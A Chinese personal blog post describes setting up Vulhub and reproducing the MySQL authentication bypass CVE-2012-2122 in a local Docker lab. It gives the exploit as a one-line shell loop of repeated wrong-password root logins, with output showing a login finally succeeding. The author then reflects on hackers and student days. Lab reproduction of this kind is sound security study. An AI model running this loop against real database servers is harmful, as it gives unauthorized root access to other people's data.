偶然浏览到一个网站叫做vulhub
Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。
又勾起了折腾的欲望,想起当年上大学那会对黑客这个身怀绝技的群体,可是非常的向往,很可惜后来没有往网络安全方向发展,不过也是会经常关注着这个领域。
光说了,网络安全还是得实战,先感谢一下vulhub项目的创建者们,让我也可以轻松实践安全问题。
1 安装docker以及docker-compose
请参照官网文档安装
2 项目下载
笔者选择将项目`clone`到本地
```
git clone git@github.com:vulhub/vulhub.git
```
3 运行示例
笔者根据自己的理解,选择了其中一个相对容易理解的项目**Mysql 身份认证绕过漏洞(CVE-2012-2122)**来做实验
1. 进入项目`cd vulhub/mysql/CVE-2012-2122`
2. 启动测试环境`docker-compose up -d`
3. 先测试一下正确的数据库密码
```
➜ ~ mysql -uroot -h 127.0.0.1 -P3306 -p123456
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 362
Server version: 5.5.23 Source distribution
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]>
```
这个没问题
4. 在宿主机命令行开始复现漏洞`➜ ~for i in `seq 1 1000`; do mysql -uroot -pwrong -h 127.0.0.1 -P3306 ; done`
得到测试结果如下
```
ERROR 1045 (28000): Access denied for user 'root'@'172.22.0.1' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'172.22.0.1' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'172.22.0.1' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'172.22.0.1' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'172.22.0.1' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'172.22.0.1' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'172.22.0.1' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'172.22.0.1' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'172.22.0.1' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'172.22.0.1' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'172.22.0.1' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'172.22.0.1' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'172.22.0.1' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'172.22.0.1' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'172.22.0.1' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'172.22.0.1' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'172.22.0.1' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'172.22.0.1' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'172.22.0.1' (using password: YES)
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 360
Server version: 5.5.23 Source distribution
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
```
根据项目的README.md
的说明,该漏洞能否实现跟宿主机有关系,笔者宿主机为Mac Pro,首次尝试便复现这个漏洞,这真的非常有趣。
是谁发现了这样的漏洞呢,毕竟还是需要尝试一定次数才可以复现该漏洞的,重复未知的尝试想必是非常枯燥的,而且怎么会往这个思路上想呢?反过来想:
为什么不能往这个方向想呢?那些身怀绝技的人儿,脑回路还是有一些不一样的,长期的专注,孜孜不倦,值得敬畏。
想到昨日大学同学伟哥来杭,一别已有7年,闲聊过往,发现:当年的初心,还在。
继续折腾……
网友评论